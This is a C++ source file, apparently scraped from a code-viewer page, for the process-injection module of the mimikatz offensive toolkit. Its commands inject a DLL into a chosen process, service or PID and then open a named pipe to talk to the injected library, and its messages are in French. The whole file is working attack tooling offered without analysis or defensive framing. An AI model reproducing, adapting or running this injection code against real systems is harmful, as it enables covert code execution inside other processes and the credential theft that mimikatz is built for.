1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
|
/* Benjamin DELPY `gentilkiwi`
http://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : http://creativecommons.org/licenses/by/3.0/fr/
*/
#include "mod_mimikatz_inject.h"
#include "..\global.h"
mod_pipe * mod_mimikatz_inject::monCommunicator = NULL;
vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_inject::getMimiKatzCommands()
{
vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector;
monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(pid, L"pid", L"Injecte une librairire communicante dans un PID"));
monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(process, L"process", L"Injecte une librairire communicante dans un processus"));
monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(service, L"service", L"Injecte une librairire communicante dans un service"));
return monVector;
}
bool mod_mimikatz_inject::process(vector<wstring> * arguments)
{
wstring processName = arguments->front();
wstring fullLib = arguments->back();
mod_process::KIWI_PROCESSENTRY32 monProcess;
if(mod_process::getUniqueForName(&monProcess, &processName))
{
(*outputStream) << L"PROCESSENTRY32(" << processName << L").th32ProcessID = " << monProcess.th32ProcessID << endl;
injectInPid(monProcess.th32ProcessID, fullLib);
}
else (*outputStream) << L"Trop, ou pas de processus : \'" << processName << L"\' mod_process::getUniqueProcessForName : " << mod_system::getWinError() << endl;
return true;
}
bool mod_mimikatz_inject::service(vector<wstring> * arguments)
{
wstring serviceName = arguments->front();
wstring fullLib = arguments->back();
mod_service::KIWI_SERVICE_STATUS_PROCESS monService;
if(mod_service::getUniqueForName(&monService, &serviceName))
{
(*outputStream) << L"SERVICE(" << serviceName << L").serviceDisplayName = " << monService.serviceDisplayName << endl;
(*outputStream) << L"SERVICE(" << serviceName << L").ServiceStatusProcess.dwProcessId = " << monService.ServiceStatusProcess.dwProcessId << endl;
injectInPid(monService.ServiceStatusProcess.dwProcessId, fullLib);
}
else (*outputStream) << L"Service unique introuvable : \'" << serviceName << L"\' ; mod_service::getUniqueForName : " << mod_system::getWinError() << endl;
return true;
}
bool mod_mimikatz_inject::pid(vector<wstring> * arguments)
{
wstring strPid = arguments->front();
wstring fullLib = arguments->back();
DWORD pid;
wstringstream monStream(strPid);
monStream >> pid;
injectInPid(pid, fullLib, !(arguments->size() >= 3));
return true;
}
bool mod_mimikatz_inject::injectInPid(DWORD & pid, wstring & libPath, bool isComm)
{
bool reussite = false;
if(!isComm || (isComm && !monCommunicator))
{
if(reussite = mod_inject::injectLibraryInPid(pid, &libPath))
{
if(isComm)
{
wstring monBuffer = L"";
monCommunicator = new mod_pipe(L"kiwi\\mimikatz");
(*outputStream) << L"Attente de connexion du client..." << endl;
if(monCommunicator->createServer())
{
(*outputStream) << L"Serveur connecté à un client !" << endl;
if(monCommunicator->readFromPipe(monBuffer))
{
(*outputStream) << L"Message du processus :" << endl << monBuffer << endl;
}
else
{
(*outputStream) << L"Erreur : Impossible de lire le premier message ! ; " << mod_system::getWinError() << endl;
closeThisCommunicator();
}
}
else
{
(*outputStream) << L"Erreur : Impossible de créer un canal de communication ! ; " << mod_system::getWinError() << endl;
closeThisCommunicator();
}
}
else
(*outputStream) << L"Injecté sans communication (legacy)" << endl;
} else (*outputStream) << L"Erreur : Impossible d\'injecter ! ; " << mod_system::getWinError() << endl;
}
else (*outputStream) << L"Erreur : un canal de communicaton est déjà ouvert" << endl;
return reussite;
}
bool mod_mimikatz_inject::closeThisCommunicator()
{
if(monCommunicator)
{
(*outputStream) << L"Fermeture du canal de communication" << endl;
delete monCommunicator;
monCommunicator = NULL;
}
return true;
}
|